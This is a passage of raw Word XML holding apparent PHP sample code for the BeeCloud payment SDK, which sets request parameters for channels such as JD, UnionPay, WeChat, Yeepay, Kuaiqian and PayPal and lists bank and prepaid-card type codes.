          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交通银行</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">          9109    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中国银行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133CE0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9105    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中国建设银行</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">      9110     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>平安银行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21870C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E836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$data["bank_code"] = 9102;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9041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京东</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B2B";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182C7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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E316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'JD_WEB' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484923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"JD_WEB";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D817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京东网页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551D5B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24CB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'JD_WAP' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B6E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"JD_WAP";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC6E9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京东移动网页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C03F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E5C61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'UN_WEB' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0923C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"UN_WEB";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C79C3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银联网页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265919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3291D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'UN_WAP' : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B701F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"UN_WAP";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3777E1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银联移动网页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0F23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8D3D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'WX_NATIVE':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1108EB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"WX_NATIVE";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E506A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微信扫码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E05E9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VENDOR_PATH.'/beecloud/wx/native.php';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E968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C5BC1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70B2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'WX_JSAPI':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329A5E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"WX_JSAPI";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6739C0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微信</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>H5</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>网页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA0DD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VENDOR_PATH.'/beecloud/wx/jsapi.php';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F52C4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53B9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A51B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'YEE_WEB' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B351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"YEE_WEB";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE17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易宝网页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAB2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2DCF9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'YEE_WAP' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326D0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"YEE_WAP";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACA0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$data["identity_id"] = "lengthlessthan50useruniqueid";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F354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易宝移动网页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF136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FCFA1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'YEE_NOBANKCARD':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B67F5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$data["total_fee"] = 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4B80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"YEE_NOBANKCARD";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018E49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$data["cardno"] = "15078120125091678";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB7F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$data["cardpwd"] = "121684730734269992";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E42A9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7374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frqid </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>点卡类型编码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E514C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骏网一卡通</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(JUNNET),</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>盛大卡</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(SNDACARD),</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>神州行</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(SZX),</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>征途卡</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(ZHENGTU),Q</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>币卡</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(QQCARD),</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>联通卡</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(UNICOM),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEDB1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久游卡</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(JIUYOU),</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>易充卡</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(YICHONGCARD),</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>网易卡</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(NETEASE),</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>完美卡</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(WANMEI),</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>搜狐卡</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(SOHU),</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>电信卡</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(TELECOM),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAE8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纵游一卡通</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(ZONGYOU),</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>天下一卡通</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(TIANXIA),</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>天宏一卡通</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">(TIANHONG),32 </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>一卡通</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(THIRTYTWOCARD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E795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1236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$data["frqid"] = "SZX";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772953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易宝点卡支付</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076B8C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4018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'KUAIQIAN_WEB' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF4F2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"KUAIQIAN_WEB";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7204F7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快钱移动网页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43892A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033C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'KUAIQIAN_WAP' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEEBD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"KUAIQIAN_WEB";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF8D4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快钱移动网页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEF1C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935A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'PAYPAL_PAYPAL' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F8DF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"PAYPAL_PAYPAL";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAF4B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EBF5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currency</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数的对照表</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请参考</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D34F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https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048DF2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ABB7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$data["currency"] = "USD";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB20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"Paypal</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>网页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB89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6218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'PAYPAL_CREDITCARD' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6F7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"PAYPAL_CREDITCARD";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D96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6D29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currency</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数的对照表</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请参考</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D85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https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E5F5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F8A7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$data["currency"] = "USD";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2CCD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$card_info = array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DF0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'card_number' =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F77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'expire_month' =&gt; 1,  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAB25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'expire_year' =&gt; 2016, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDB81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'cvv' =&gt; 0,           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF52B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'first_name' =&gt; '', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278EB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'last_name' =&gt; '',  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29163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'card_type' =&gt; 'visa' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5396B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9020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$data["credit_card_info"] = (object)$card_info;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2B6F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"Paypal</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>信用卡</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507042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7DAFB1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'PAYPAL_SAVED_CREDITCARD' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583A2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"PAYPAL_SAVED_CREDITCARD";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2490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C5A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currency</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数的对照表</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请参考</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CCE2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https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1624AC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F50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$data["currency"] = "USD";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBDC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$data["credit_card_id"] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65704E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"Paypal</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>快捷</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207CA7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93B4A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'BC_GATEWAY' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22940F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$data["channel"] = "BC_GATEWAY";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251D4E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$data["pay_type"] = "B2C";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7064F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AF6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card_type(string </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>) for channel BC_GATEWAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D70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卡类型</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>: 1</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>代表信用卡；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>代表借记卡</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3CD0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0755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$data["card_type"] = '1';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A754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$data["bank"] = "</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中国银行</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB3B4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网关支付</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C13D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12C4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bank(string </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>) for channel BC_GATEWAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6818E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根据参数</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>card_type, pay_type(B2C/B2B</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
